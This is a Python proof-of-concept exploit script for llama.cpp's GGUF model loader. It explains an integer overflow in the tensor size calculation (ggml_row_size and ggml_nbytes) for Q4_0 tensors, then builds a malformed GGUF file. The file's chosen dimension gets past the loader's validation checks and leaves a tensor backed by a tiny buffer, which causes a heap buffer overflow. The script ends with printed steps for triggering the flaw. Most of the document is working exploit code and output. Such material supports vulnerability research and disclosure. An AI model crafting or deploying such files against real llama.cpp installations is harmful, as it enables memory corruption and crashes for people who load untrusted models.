File size: 19,196 Bytes
d6a1163 | 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 379 380 381 382 383 384 385 386 387 388 389 390 391 392 393 394 395 396 397 398 399 400 401 402 403 404 405 406 407 408 409 410 411 412 413 414 415 416 417 418 419 420 421 422 423 424 425 426 427 428 429 430 431 432 433 434 435 436 437 438 439 440 441 442 443 444 445 446 447 448 449 450 451 452 453 454 455 456 457 458 459 460 461 462 463 464 465 466 467 468 469 470 471 472 473 474 475 476 477 478 479 480 481 482 483 484 485 486 487 488 489 490 491 492 493 494 495 496 497 498 499 500 501 502 503 504 505 506 507 508 509 510 511 512 513 514 515 516 517 518 519 520 521 522 523 524 | #!/usr/bin/env python3
"""
PoC: Heap Buffer Overflow via Integer Overflow in Tensor Size Calculation
Target: llama.cpp GGUF loading (ggml/src/ggml.c and ggml/src/gguf.cpp)
=== Vulnerability Summary ===
In ggml_row_size() (ggml.c:1275):
size_t ggml_row_size(enum ggml_type type, int64_t ne) {
return ggml_type_size(type)*ne/ggml_blck_size(type);
}
The multiplication `ggml_type_size(type) * ne` is performed in size_t (uint64_t)
arithmetic. When type_size * ne > 2^64, this silently wraps around, producing a
much smaller result than expected. The subsequent division by blck_size then yields
a tiny value.
This propagates to:
- ggml_new_tensor_impl() (ggml.c:1686) where data_size is computed
- ggml_nbytes() (ggml.c:1238) where the tensor byte size is computed
- Buffer allocation and data loading code
The overflow check in gguf.cpp (lines 550-552) verifies that the ELEMENT COUNT
(ne[0]*ne[1]*ne[2]*ne[3]) fits in int64_t, but does NOT check that the BYTE SIZE
(element_count * type_size / blck_size) fits in size_t. For quantized types where
type_size > blck_size, the byte size can overflow even when the element count doesn't.
The check at gguf.cpp line 589:
uint64_t(ggml_nelements(&info.t)/ggml_blck_size(info.t.type)) > SIZE_MAX/ggml_type_size(info.t.type)
uses ggml_nelements() which itself computes ne[0]*ne[1]*ne[2]*ne[3] in int64_t.
For our chosen values, this product fits in int64_t, so ggml_nelements returns the
correct value. BUT the subsequent division and comparison uses integer arithmetic
that can be imprecise for values near SIZE_MAX.
=== Exploit Strategy ===
For GGML_TYPE_Q4_0:
- type_size = 18 bytes (sizeof(block_q4_0) = sizeof(ggml_half) + 32/2 = 2 + 16)
- blck_size = 32
We choose ne[0] such that 18 * ne[0] wraps around 2^64 to a tiny value.
ne[0] = 1024819115206086208 (divisible by 32)
Mathematical: 18 * ne[0] = 18446744073709551744 = 2^64 + 128
In uint64: 18 * ne[0] mod 2^64 = 128
After /32: 128 / 32 = 4 bytes (ggml_row_size returns 4!)
Correct: 18 * ne[0] / 32 = 576460752303423492 bytes (~512 PB)
Computed: 4 bytes
Ratio: buffer is 144,115,188,075,855,873x too small!
Validation bypass:
- ne[0] = 1024819115206086208 < INT64_MAX (9223372036854775807) -> passes
- ne[0] > 0 -> passes non-negative check
- ne[0] % 32 == 0 -> passes block alignment check
- ggml_nelements = ne[0] = 1024819115206086208
- nelements/32 = 32025597350190194
- SIZE_MAX/18 = 1024819115206086200
- 32025597350190194 < 1024819115206086200 -> passes byte size check (line 589)!
Result: A tensor is created with ne[0] = 1024819115206086208 elements but backed
by only 4-32 bytes of actual buffer. Any operation that accesses data beyond the
first few bytes triggers a heap buffer overflow.
=== GGUF Binary Format Reference ===
Header:
- Magic: "GGUF" (4 bytes)
- Version: uint32 (3)
- n_tensors: uint64
- n_kv: uint64
KV pairs:
- key: string (uint64 len + chars)
- type: uint32 (GGUF type enum)
- value: type-dependent
Tensor info (per tensor):
- name: string (uint64 len + chars)
- n_dims: uint32
- ne[0..n_dims-1]: int64 each
- type: uint32 (ggml_type enum)
- offset: uint64
Data section: aligned to ctx->alignment (default 32)
"""
import struct
import sys
import os
import math
# ============================================================
# GGUF constants
# ============================================================
GGUF_MAGIC = b"GGUF"
GGUF_VERSION = 3
# GGUF value types
GGUF_TYPE_UINT8 = 0
GGUF_TYPE_INT8 = 1
GGUF_TYPE_UINT16 = 2
GGUF_TYPE_INT16 = 3
GGUF_TYPE_UINT32 = 4
GGUF_TYPE_INT32 = 5
GGUF_TYPE_FLOAT32 = 6
GGUF_TYPE_BOOL = 7
GGUF_TYPE_STRING = 8
GGUF_TYPE_ARRAY = 9
GGUF_TYPE_UINT64 = 10
GGUF_TYPE_INT64 = 11
GGUF_TYPE_FLOAT64 = 12
# ggml_type enum values
GGML_TYPE_F32 = 0
GGML_TYPE_F16 = 1
GGML_TYPE_Q4_0 = 2
GGML_TYPE_Q4_1 = 3
GGML_TYPE_Q5_0 = 6
GGML_TYPE_Q5_1 = 7
GGML_TYPE_Q8_0 = 8
GGML_TYPE_I8 = 24
GGML_TYPE_I32 = 26
# Q4_0 type properties
Q4_0_TYPE_SIZE = 18 # sizeof(block_q4_0) = sizeof(ggml_half) + QK4_0/2 = 2 + 16
Q4_0_BLCK_SIZE = 32 # QK4_0
INT64_MAX = (1 << 63) - 1
UINT64_MAX = (1 << 64) - 1
SIZE_MAX = UINT64_MAX # 64-bit platform
GGML_DEFAULT_ALIGNMENT = 32
# ============================================================
# Helper functions
# ============================================================
def write_string(f, s):
"""Write a GGUF string: uint64 length + chars (no null terminator)"""
encoded = s.encode('utf-8')
f.write(struct.pack('<Q', len(encoded)))
f.write(encoded)
def write_kv_string(f, key, value):
"""Write a KV pair with string value"""
write_string(f, key)
f.write(struct.pack('<I', GGUF_TYPE_STRING))
write_string(f, value)
def write_kv_uint32(f, key, value):
"""Write a KV pair with uint32 value"""
write_string(f, key)
f.write(struct.pack('<I', GGUF_TYPE_UINT32))
f.write(struct.pack('<I', value))
def write_kv_float32(f, key, value):
"""Write a KV pair with float32 value"""
write_string(f, key)
f.write(struct.pack('<I', GGUF_TYPE_FLOAT32))
f.write(struct.pack('<f', value))
def write_kv_string_array(f, key, values):
"""Write a KV pair with string array value"""
write_string(f, key)
f.write(struct.pack('<I', GGUF_TYPE_ARRAY))
f.write(struct.pack('<I', GGUF_TYPE_STRING))
f.write(struct.pack('<Q', len(values)))
for v in values:
write_string(f, v)
def write_kv_float32_array(f, key, values):
"""Write a KV pair with float32 array value"""
write_string(f, key)
f.write(struct.pack('<I', GGUF_TYPE_ARRAY))
f.write(struct.pack('<I', GGUF_TYPE_FLOAT32))
f.write(struct.pack('<Q', len(values)))
for v in values:
f.write(struct.pack('<f', v))
def write_tensor_info(f, name, n_dims, ne_list, ggml_type, offset):
"""Write a single tensor info entry"""
write_string(f, name)
f.write(struct.pack('<I', n_dims))
for i in range(n_dims):
f.write(struct.pack('<q', ne_list[i])) # int64_t (signed)
f.write(struct.pack('<I', ggml_type))
f.write(struct.pack('<Q', offset))
# ============================================================
# Overflow calculation and verification
# ============================================================
def compute_overflow_ne0():
"""
Find ne[0] for Q4_0 type such that:
- ne[0] is positive and fits in int64_t (< 2^63)
- ne[0] is divisible by blck_size (32)
- 18 * ne[0] overflows uint64_t to a very small value
- All GGUF validation checks pass
We solve: 18 * ne[0] = k * 2^64 + remainder
For k=1: ne[0] = (2^64 + remainder) / 18
We want remainder to be small and divisible by 32 (so that
ggml_row_size = remainder/32 is small).
18 * ne[0] = 2^64 + 128 (remainder=128, 128/32=4)
ne[0] = (2^64 + 128) / 18 = 1024819115206086208
"""
type_size = Q4_0_TYPE_SIZE # 18
blck_size = Q4_0_BLCK_SIZE # 32
# We want: type_size * ne0 = 2^64 + target_remainder
# Choose target_remainder = 128 (divisible by 32, gives row_size of 4)
target_remainder = 128
target_product = (1 << 64) + target_remainder
if target_product % type_size != 0:
raise ValueError(f"Cannot find exact ne[0]: {target_product} not divisible by {type_size}")
ne0 = target_product // type_size
assert ne0 * type_size == target_product, "Arithmetic check failed"
# Verify ne0 is divisible by blck_size
assert ne0 % blck_size == 0, f"ne[0]={ne0} not divisible by blck_size={blck_size}"
# Verify ne0 fits in int64_t
assert 0 < ne0 < (1 << 63), f"ne[0]={ne0} does not fit in int64_t"
return ne0
def verify_overflow(ne0, ne1=1, ne2=1, ne3=1):
"""Verify that the chosen dimensions bypass all checks and cause overflow"""
type_size = Q4_0_TYPE_SIZE
blck_size = Q4_0_BLCK_SIZE
print(f"\n{'='*70}")
print("OVERFLOW ANALYSIS")
print(f"{'='*70}")
print(f"Type: Q4_0 (type_size={type_size}, blck_size={blck_size})")
print(f"Dimensions: ne[0]={ne0}, ne[1]={ne1}, ne[2]={ne2}, ne[3]={ne3}")
print()
# Check 1: gguf.cpp line 540-546 - non-negative check
assert ne0 >= 0 and ne1 >= 0 and ne2 >= 0 and ne3 >= 0
print("[PASS] All ne[j] >= 0 (non-negative check)")
# Check 2: gguf.cpp line 550-552 - overflow check
# INT64_MAX/ne[1] <= ne[0] -> must be FALSE to pass
check1 = INT64_MAX // ne1 <= ne0
print(f" Check 1: INT64_MAX/ne[1] = {INT64_MAX // ne1} <= ne[0] = {ne0} ? {check1}")
assert not check1, "Failed overflow check 1!"
# INT64_MAX/ne[2] <= ne[0]*ne[1] -> must be FALSE
prod01 = ne0 * ne1 # Safe in Python (arbitrary precision)
assert prod01 < (1 << 63), f"ne[0]*ne[1] = {prod01} overflows int64_t!"
check2 = INT64_MAX // ne2 <= prod01
print(f" Check 2: INT64_MAX/ne[2] = {INT64_MAX // ne2} <= ne[0]*ne[1] = {prod01} ? {check2}")
assert not check2, "Failed overflow check 2!"
# INT64_MAX/ne[3] <= ne[0]*ne[1]*ne[2] -> must be FALSE
prod012 = prod01 * ne2
assert prod012 < (1 << 63), f"ne[0]*ne[1]*ne[2] = {prod012} overflows int64_t!"
check3 = INT64_MAX // ne3 <= prod012
print(f" Check 3: INT64_MAX/ne[3] = {INT64_MAX // ne3} <= ne[0]*ne[1]*ne[2] = {prod012} ? {check3}")
assert not check3, "Failed overflow check 3!"
print("[PASS] Overflow check at gguf.cpp:550-552 bypassed")
# Check 3: gguf.cpp line 580 - block alignment
assert ne0 % blck_size == 0
print(f"[PASS] ne[0] % blck_size == 0 (block alignment check)")
# Check 4: gguf.cpp line 589 - byte size representable
nelements = ne0 * ne1 * ne2 * ne3
assert nelements < (1 << 63), "ggml_nelements overflows int64_t!"
lhs = nelements // blck_size # uint64_t(ggml_nelements/blck_size)
rhs = SIZE_MAX // type_size # SIZE_MAX/type_size
byte_check = lhs > rhs
print(f" Byte size check: nelements/blck_size = {lhs} > SIZE_MAX/type_size = {rhs} ? {byte_check}")
assert not byte_check, "Failed byte size check!"
print("[PASS] Byte size check at gguf.cpp:589 bypassed")
# Now compute the ACTUAL overflow
print(f"\n{'='*70}")
print("SIZE COMPUTATION (showing the overflow)")
print(f"{'='*70}")
# ggml_row_size(Q4_0, ne[0]) = type_size * ne[0] / blck_size
true_product = type_size * ne0
wrapped_product = true_product % (1 << 64) # uint64_t wrap
row_size_overflowed = wrapped_product // blck_size
row_size_correct = true_product // blck_size
print(f"\nggml_row_size computation:")
print(f" type_size * ne[0] = {true_product}")
print(f" = 2^64 * {true_product // (1 << 64)} + {true_product % (1 << 64)}")
print(f" In uint64_t (mod 2^64): {wrapped_product}")
print(f" After / blck_size: {row_size_overflowed} bytes <-- OVERFLOWED!")
print(f" Correct value: {row_size_correct} bytes")
print(f" Overflow factor: {row_size_correct / row_size_overflowed:.0f}x too small!")
# data_size computation
data_size = row_size_overflowed
for dim in [ne1, ne2, ne3]:
if dim > 1:
data_size = (data_size * dim) % (1 << 64)
correct_size = row_size_correct * ne1 * ne2 * ne3
print(f"\ndata_size (ggml_new_tensor_impl):")
print(f" Computed: {data_size} bytes ({data_size} B)")
print(f" Correct: {correct_size} bytes ({correct_size / (1024**5):.1f} PB)")
# ggml_nbytes computation
# For quantized: nbytes = ne[0]*nb[0]/blck_size + sum((ne[i]-1)*nb[i])
nb0 = type_size # = 18
nb1 = type_size * (ne0 // blck_size) # This doesn't overflow because ne0/32 is reasonable
nb2 = nb1 * ne1
nb3 = nb2 * ne2
# ne[0] * nb[0] overflows!
ne0_nb0_true = ne0 * nb0
ne0_nb0_wrapped = ne0_nb0_true % (1 << 64)
nbytes_first = ne0_nb0_wrapped // blck_size
nbytes = nbytes_first
if ne1 > 1:
nbytes += (ne1 - 1) * nb1
if ne2 > 1:
nbytes += (ne2 - 1) * nb2
if ne3 > 1:
nbytes += (ne3 - 1) * nb3
nbytes_correct = correct_size
print(f"\nggml_nbytes:")
print(f" ne[0]*nb[0] = {ne0} * {nb0} = {ne0_nb0_true}")
print(f" In uint64_t: {ne0_nb0_wrapped}")
print(f" / blck_size: {nbytes_first}")
print(f" + stride terms: {nbytes - nbytes_first}")
print(f" Total nbytes: {nbytes} bytes")
print(f" Correct value: {nbytes_correct} bytes")
# What gets allocated vs what the tensor "thinks" it has
padded = ((nbytes + GGML_DEFAULT_ALIGNMENT - 1) // GGML_DEFAULT_ALIGNMENT) * GGML_DEFAULT_ALIGNMENT
print(f"\n{'='*70}")
print("HEAP BUFFER OVERFLOW")
print(f"{'='*70}")
print(f" Buffer allocated: {padded} bytes (GGML_PAD({nbytes}, {GGML_DEFAULT_ALIGNMENT}))")
print(f" Tensor logical size: {nbytes_correct} bytes")
print(f" Overflow: {nbytes_correct - padded} bytes beyond allocation")
print(f" Stride nb[1]: {nb1} bytes (distance between rows)")
print(f" Any access to row 1+ is {nb1 - padded} bytes out of bounds!")
return data_size, nbytes, padded
def create_poc_gguf(output_path):
"""
Create a GGUF file with a tensor whose dimensions cause integer overflow
in ggml_row_size(), resulting in a tiny buffer allocation for what should
be an enormous tensor.
"""
ne0 = compute_overflow_ne0()
ne1 = 1 # Keep simple - 1D tensor is enough to trigger the overflow
ne2 = 1
ne3 = 1
data_size, nbytes, padded_size = verify_overflow(ne0, ne1, ne2, ne3)
# ---- Build the GGUF file ----
# Metadata KV pairs needed for llama.cpp to proceed with loading
kv_pairs = []
n_kv = 0
# Tensors: one tensor with overflow-inducing dimensions
# Use a name that llama.cpp expects for a llama model
tensor_name = "token_embd.weight"
n_tensors = 1
print(f"\n{'='*70}")
print("GENERATING GGUF FILE")
print(f"{'='*70}")
print(f" Tensor: '{tensor_name}'")
print(f" Type: Q4_0 (type_size=18, blck_size=32)")
print(f" Dimensions: ne[0]={ne0}")
print(f" Tensor data in file: {padded_size} bytes (the overflowed/small size)")
print(f" Output: {output_path}")
with open(output_path, 'wb') as f:
# ---- GGUF Header ----
f.write(GGUF_MAGIC)
f.write(struct.pack('<I', GGUF_VERSION))
f.write(struct.pack('<Q', n_tensors))
# Minimal token vocabulary (just 4 tokens: UNK, BOS, EOS, and a word)
vocab_tokens = ["<unk>", "<s>", "</s>", "hello"]
vocab_scores = [0.0, 0.0, 0.0, -1.0]
vocab_types = [0, 3, 3, 1] # NORMAL=0, CONTROL=3, NORMAL=1
# Count KV pairs: 13 scalar + 3 array = 16
n_kv = 16
f.write(struct.pack('<Q', n_kv))
# ---- Write scalar KV pairs ----
write_kv_string(f, "general.architecture", "llama")
write_kv_string(f, "general.name", "overflow-poc")
write_kv_uint32(f, "llama.context_length", 2048)
write_kv_uint32(f, "llama.embedding_length", 4096)
write_kv_uint32(f, "llama.block_count", 1)
write_kv_uint32(f, "llama.feed_forward_length", 11008)
write_kv_uint32(f, "llama.attention.head_count", 32)
write_kv_uint32(f, "llama.attention.head_count_kv", 32)
write_kv_float32(f, "llama.rope.freq_base", 10000.0)
write_kv_float32(f, "llama.attention.layer_norm_rms_epsilon", 1e-5)
write_kv_string(f, "tokenizer.ggml.model", "llama")
write_kv_uint32(f, "tokenizer.ggml.bos_token_id", 1)
write_kv_uint32(f, "tokenizer.ggml.eos_token_id", 2)
# ---- Write array KV pairs (tokenizer vocab) ----
write_kv_string_array(f, "tokenizer.ggml.tokens", vocab_tokens)
write_kv_float32_array(f, "tokenizer.ggml.scores", vocab_scores)
# token types: int32 array
write_string(f, "tokenizer.ggml.token_type")
f.write(struct.pack('<I', GGUF_TYPE_ARRAY))
f.write(struct.pack('<I', GGUF_TYPE_INT32))
f.write(struct.pack('<Q', len(vocab_types)))
for t in vocab_types:
f.write(struct.pack('<i', t))
# ---- Write Tensor Info ----
# Tensor: 1D Q4_0 tensor with overflow-inducing ne[0]
write_tensor_info(f, tensor_name, 1, [ne0], GGML_TYPE_Q4_0, 0)
# ---- Align to data section ----
current_pos = f.tell()
aligned_pos = ((current_pos + GGML_DEFAULT_ALIGNMENT - 1) // GGML_DEFAULT_ALIGNMENT) * GGML_DEFAULT_ALIGNMENT
padding_needed = aligned_pos - current_pos
if padding_needed > 0:
f.write(b'\x00' * padding_needed)
# ---- Write tensor data ----
# Write exactly padded_size bytes of tensor data (the overflowed small amount)
# In practice, filling with a recognizable pattern helps identify OOB reads
tensor_data = b'\xAA' * padded_size
f.write(tensor_data)
file_size = os.path.getsize(output_path)
print(f" File size: {file_size} bytes")
print(f"\n[+] GGUF file written successfully")
return output_path
def main():
output_dir = "/Users/eltarne/Documents/script/gguf_poc"
os.makedirs(output_dir, exist_ok=True)
output_path = os.path.join(output_dir, "poc_tensor_overflow.gguf")
print("=" * 70)
print("PoC: Integer Overflow in Tensor Size Calculation (GGUF)")
print("Target: llama.cpp ggml_row_size() / ggml_nbytes()")
print("=" * 70)
# Step 1: Compute the overflow-inducing dimension
ne0 = compute_overflow_ne0()
print(f"\n[+] Found overflow-inducing ne[0] = {ne0}")
print(f" = 0x{ne0:016X}")
print(f" Fits in int64_t: {ne0 < (1 << 63)}")
print(f" Divisible by 32: {ne0 % 32 == 0}")
# Step 2: Verify all checks are bypassed
print(f"\n[+] Verifying validation bypass and computing overflow...")
# Step 3: Create the GGUF file
create_poc_gguf(output_path)
# Step 4: Instructions
print(f"\n{'='*70}")
print("EXPLOITATION")
print(f"{'='*70}")
print(f"""
When llama.cpp loads this GGUF file:
1. gguf_init_from_file() reads tensor info:
- ne[0] = {ne0}
- type = Q4_0 (type_size=18, blck_size=32)
- All validation checks PASS (see analysis above)
2. ggml_nbytes() computes tensor size:
- ne[0] * nb[0] = {ne0} * 18 = {ne0 * 18}
- In uint64_t: {(ne0 * 18) % (1 << 64)} (OVERFLOWED!)
- Result: {((ne0 * 18) % (1 << 64)) // 32} bytes instead of {ne0 * 18 // 32}
3. Buffer allocation uses the tiny overflowed size
-> Only {(((ne0 * 18) % (1 << 64)) // 32 + 31) // 32 * 32} bytes allocated
4. Tensor metadata says ne[0]={ne0} with stride nb[1]={18 * (ne0 // 32)}
-> Any access beyond first few bytes is a HEAP BUFFER OVERFLOW
To test with llama-cli (demonstrates GGUF validation bypass):
cd /Users/eltarne/Documents/script/llama.cpp/build/bin
./llama-cli -m {output_path} -p 'hello' 2>&1
# Note: llama-cli rejects at model-level shape check, but GGUF parsing passes
To test with the C test harness (demonstrates the actual overflow):
cd /Users/eltarne/Documents/script/gguf_poc
./test_tensor_overflow poc_tensor_overflow.gguf
# Shows: ggml_nbytes=4 for tensor with 10^18 elements -> HEAP BUFFER OVERFLOW
""")
if __name__ == "__main__":
main()
|